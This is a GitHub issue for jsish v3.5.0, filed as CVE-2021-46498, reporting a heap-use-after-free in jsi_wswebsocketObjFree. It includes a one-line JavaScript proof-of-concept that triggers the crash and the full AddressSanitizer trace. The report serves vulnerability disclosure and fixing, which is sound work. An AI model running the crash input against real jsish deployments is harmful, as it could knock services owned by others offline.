Headline
CVE-2021-46498: Heap-use-after-free src/jsiWebSocket.c:3190 in jsi_wswebsocketObjFree · Issue #81 · pcmacdon/jsish
Jsish v3.5.0 was discovered to contain a heap-use-after-free via jsi_wswebsocketObjFree in src/jsiWebSocket.c. This vulnerability can lead to a Denial of Service (DoS).
New issue
Have a question about this project? Sign up for a free GitHub account to open an issue and contact its maintainers and the community.
By clicking “Sign up for GitHub”, you agree to our terms of service and privacy statement. We’ll occasionally send you account related emails.
Already on GitHub? Sign in to your account
Closed
hope-fly opened this issue
Dec 24, 2021
· 0 comments
Comments
Jsish revision
Commit: 9fa798e
Version: v3.5.0
Build platform
Ubuntu 18.04.5 LTS (Linux 5.4.0-44-generic x86_64)
Build steps
export CFLAGS=’-fsanitize=address’ make
Test case
console.printf= (new WebSocket); setTimeout(console, 100000);
Execution steps & Output
$ ./jsish/jsish poc.js =====ERROR: AddressSanitizer: heap-use-after-free on address 0x61b000000080 at pc 0x55b167ed6de6 bp 0x7ffcd360f220 sp 0x7ffcd360f210 READ of size 4 at 0x61b000000080 thread T0 #0 0x55b167ed6de5 in jsi_wswebsocketObjFree src/jsiWebSocket.c:3190 #1 0x55b167e7ba2d in jsi_UserObjFree src/jsiUserObj.c:75 #2 0x55b167dfeefb in Jsi_ObjFree src/jsiObj.c:334 #3 0x55b167dffa0f in Jsi_ObjDecrRefCount src/jsiObj.c:440 #4 0x55b167cae3d1 in ValueFree src/jsiValue.c:178 #5 0x55b167cae3d1 in Jsi_ValueFree src/jsiValue.c:199 #6 0x55b167cae6cf in Jsi_DecrRefCount src/jsiValue.c:52 #7 0x55b167dfc697 in DeleteTreeValue src/jsiObj.c:177 #8 0x55b167e14384 in Jsi_TreeEntryDelete src/jsiTree.c:636 #9 0x55b167e15f10 in destroy_node src/jsiTree.c:496 #10 0x55b167e15f10 in destroy_node src/jsiTree.c:494 #11 0x55b167e15f10 in Jsi_TreeDelete src/jsiTree.c:515 #12 0x55b167dfe9df in Jsi_ObjFree src/jsiObj.c:348 #13 0x55b167dffa0f in Jsi_ObjDecrRefCount src/jsiObj.c:440 #14 0x55b167cae3d1 in ValueFree src/jsiValue.c:178 #15 0x55b167cae3d1 in Jsi_ValueFree src/jsiValue.c:199 #16 0x55b167cae6cf in Jsi_DecrRefCount src/jsiValue.c:52 #17 0x55b167dbe4d4 in Jsi_EventFree src/jsiCmds.c:204 #18 0x55b167cd44e2 in freeEventTbl src/jsiInterp.c:570 #19 0x55b167d768dd in Jsi_HashClear src/jsiHash.c:507 #20 0x55b167d76cd7 in Jsi_HashDelete src/jsiHash.c:526 #21 0x55b167ce787c in jsiInterpDelete src/jsiInterp.c:1936 #22 0x55b1684fe047 in jsi_main src/main.c:49 #23 0x7f5c2d555bf6 in __libc_start_main (/lib/x86_64-linux-gnu/libc.so.6+0x21bf6) #24 0x55b167c8d969 in _start (/usr/local/bin/jsish+0xe8969)
0x61b000000080 is located 0 bytes inside of 1656-byte region [0x61b000000080,0x61b0000006f8) freed by thread T0 here: #0 0x7f5c2e1c47a8 in __interceptor_free (/usr/lib/x86_64-linux-gnu/libasan.so.4+0xde7a8) #1 0x55b167ed6d22 in jsi_wswebsocketObjFree src/jsiWebSocket.c:3199
previously allocated by thread T0 here: #0 0x7f5c2e1c4d28 in __interceptor_calloc (/usr/lib/x86_64-linux-gnu/libasan.so.4+0xded28) #1 0x55b167cfeaa4 in Jsi_Calloc src/jsiUtils.c:57
SUMMARY: AddressSanitizer: heap-use-after-free src/jsiWebSocket.c:3190 in jsi_wswebsocketObjFree Shadow bytes around the buggy address: 0x0c367fff7fc0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0x0c367fff7fd0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0x0c367fff7fe0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0x0c367fff7ff0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0x0c367fff8000: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa =>0x0c367fff8010:[fd]fd fd fd fd fd fd fd fd fd fd fd fd fd fd fd 0x0c367fff8020: fd fd fd fd fd fd fd fd fd fd fd fd fd fd fd fd 0x0c367fff8030: fd fd fd fd fd fd fd fd fd fd fd fd fd fd fd fd 0x0c367fff8040: fd fd fd fd fd fd fd fd fd fd fd fd fd fd fd fd 0x0c367fff8050: fd fd fd fd fd fd fd fd fd fd fd fd fd fd fd fd 0x0c367fff8060: fd fd fd fd fd fd fd fd fd fd fd fd fd fd fd fd Shadow byte legend (one shadow byte represents 8 application bytes): Addressable: 00 Partially addressable: 01 02 03 04 05 06 07 Heap left redzone: fa Freed heap region: fd Stack left redzone: f1 Stack mid redzone: f2 Stack right redzone: f3 Stack after return: f5 Stack use after scope: f8 Global redzone: f9 Global init order: f6 Poisoned by user: f7 Container overflow: fc Array cookie: ac Intra object redzone: bb ASan internal: fe Left alloca redzone: ca Right alloca redzone: cb
1 participant